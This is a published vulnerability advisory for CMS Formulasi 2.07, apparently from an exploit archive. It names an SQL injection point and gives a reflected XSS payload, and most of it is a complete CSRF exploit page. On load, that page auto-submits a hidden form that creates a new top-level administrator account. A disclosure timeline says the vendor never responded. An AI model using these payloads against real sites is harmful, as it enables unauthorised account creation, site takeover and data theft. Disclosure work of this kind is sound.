################################################################################################################### ______ __ ______ / \ / | / \ /000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______ 00 \__00/ / \ / \ / \ 00 \ / \/ \ / \ 00 \__00/ / \ / | 00 \ 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 \ /000000 |/0000000/ 000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 | / \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____ 00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 | 000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/ ################################################################################################################### # Exploit Title: CMS Formulasi 2.07 Multiple Vulnerability # Date: 30 Sep 2013 # Vendor Homepage: http://formulasi.or.id/ # Software Link: http://cms.formulasi.or.id/p/download-cms-formulasi-terbaru.htm # Version: 2.07 # Tested on: Win 7/Backtrack # CVE : # Exploit Author: Sarahma Security # Author Homepage: http://sarahma.co.id # Author Email: research@sarahma.co.id ======================== SQL Injection ======================== Found on http://localhost/formulasi/kelas-siswa.html parameter : kelas post data : kelas=1{SQL_HERE} ======================== XSS Vulnerability ======================== Found On parameter : tgl http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script> ======================== CSRF Vulnerability ======================== ---------------------BOF-------------------------------------------------- <html> <head> <title>Formulasi CRSFT Exploit</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "489","36","27" ); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis); } function fireForms() { var count = 3; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); pausecomp(pauses[i]); } } </script> <H2>Formulasi CRSFT Exploit</H2> <form method="POST" name="form1" action="http://localhost:80/cmsformulasi/adminpanel/aplikasi/admin/admin.php?pilih=admin&untukdi=tambah"> <input type="hidden" name="nama_admin" value="usernya"/> <input type="hidden" name="username" value="Sarahma12"/> <input type="hidden" name="email" value="research@sarahma.co.id"/> <input type="hidden" name="level_users" value="1"/> <input type="hidden" name="password" value="Password12"/> <input type="hidden" name="password_lagi" value="Password12"/> </form> </body> </html> ---------------------EOF-------------------------------------------------- ======================== Solution : ======================== No Update Until This Advisory published ======================== Timeline: ======================== 2013-09-27 Provided details vulnerability to vendor 2013-10-01 Second NotificaTon Vendor 2013-10-04 No Response From Vendor 2013-10-05 Advisory publishedБрой прочитания на тази страница: 690
CMS Formulasi 2.07 – Multiple Vulnerabilities